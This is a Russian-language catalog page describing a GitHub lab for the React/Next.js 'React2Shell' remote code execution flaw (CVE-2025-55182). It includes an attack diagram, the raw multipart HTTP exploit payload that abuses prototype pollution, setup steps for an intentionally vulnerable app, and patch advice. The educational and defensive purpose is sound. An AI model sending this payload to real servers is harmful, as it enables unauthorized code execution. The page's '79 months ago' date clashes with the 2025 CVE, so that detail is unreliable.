Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
react-rce — Мы создали и протестировали сэмпл для уязвимости CVE-2025-55182 вместе с ИИ. | Kitploit
Инструменты/GitHubGitHub/randarts/react-rce
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатация веб-приложенийОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика
GitHubrandarts/react-rce

react-rce

Мы создали и протестировали сэмпл для уязвимости CVE-2025-55182 вместе с ИИ.

Репозиторий
79 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 React2Shell: практикум по уязвимости

Используемый ИИ: Claude Opus 4.5 ⚠️ Предупреждение: Эта среда предназначена только для образовательных и исследовательских целей.

Обзор уязвимости

ПолеСодержание
CVECVE-2025-55182 (React) / CVE-2025-66478 (Next.js)
НазваниеReact2Shell
CVSS10.0 (Critical)
ТипPre-Auth Remote Code Execution
ПричинаЗагрязнение прототипа при десериализации протокола Flight

Принцип атаки

                    ┌─────────────────────────┐
                    │     Attacker            │
                    └───────────┬─────────────┘
                                │
                    POST Request + Next-Action Header
                    multipart/form-data payload
                                │
                                ▼
┌───────────────────────────────────────────────────────────┐
│                     Next.js Server                        │
├───────────────────────────────────────────────────────────┤
│  1. Next-Action 헤더 → Server Action 트리거                  │
│  2. multipart 페이로드 → Flight 프로토콜 역직렬화                │
│  3. Fake Chunk 객체의 then() 메서드 호출                       │
│  4. __proto__ 참조 → 프로토타입 오염                           │
│  5. Function 생성자 주입 → RCE                               │
└───────────────────────────────────────────────────────────┘

Структура эксплойт-пейлоада

POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="0"

{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"

$@0
------Boundary--

Ключевые элементы:

  • Запуск Server Action через заголовок Next-Action
  • Поле 0: фейковый Chunk с методом then для поведения, подобного промису
  • Поле 1: обход цепочки прототипов через ссылку $@0
  • Доступ к конструктору Function через __proto__:then

Быстрый старт

cd vulnerable-app

# 의존성 설치
npm install

# 개발 서버 시작
npm run dev

Доступ по адресу http://localhost:3000


Структура каталога

react-rce/
├── README.md
├── vulnerable-app/          # 취약한 Next.js 앱
│   ├── package.json         # Next.js 15.0.3 (취약 버전)
│   └── app/
│       ├── page.js          # UI (CVE 정보 + RCE 시연)
│       ├── actions.js       # Server Actions
│       └── globals.css
└── exploit/                 # 공격 도구 (선택)
    └── exploit.py           # CVE-2025-55182 PoC

Затронутые версии

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (при использовании App Router)
  • Пакеты: react-server-dom-webpack, react-server-dom-turbopack

Методы защиты

# 패치 버전으로 업그레이드
npm install [email protected] [email protected] [email protected]

Ссылки

  • Бюллетень безопасности Next.js
  • GitHub: assetnote/react2shell-scanner
  • GitHub: freeqaz/react2shell
Скачать инструмент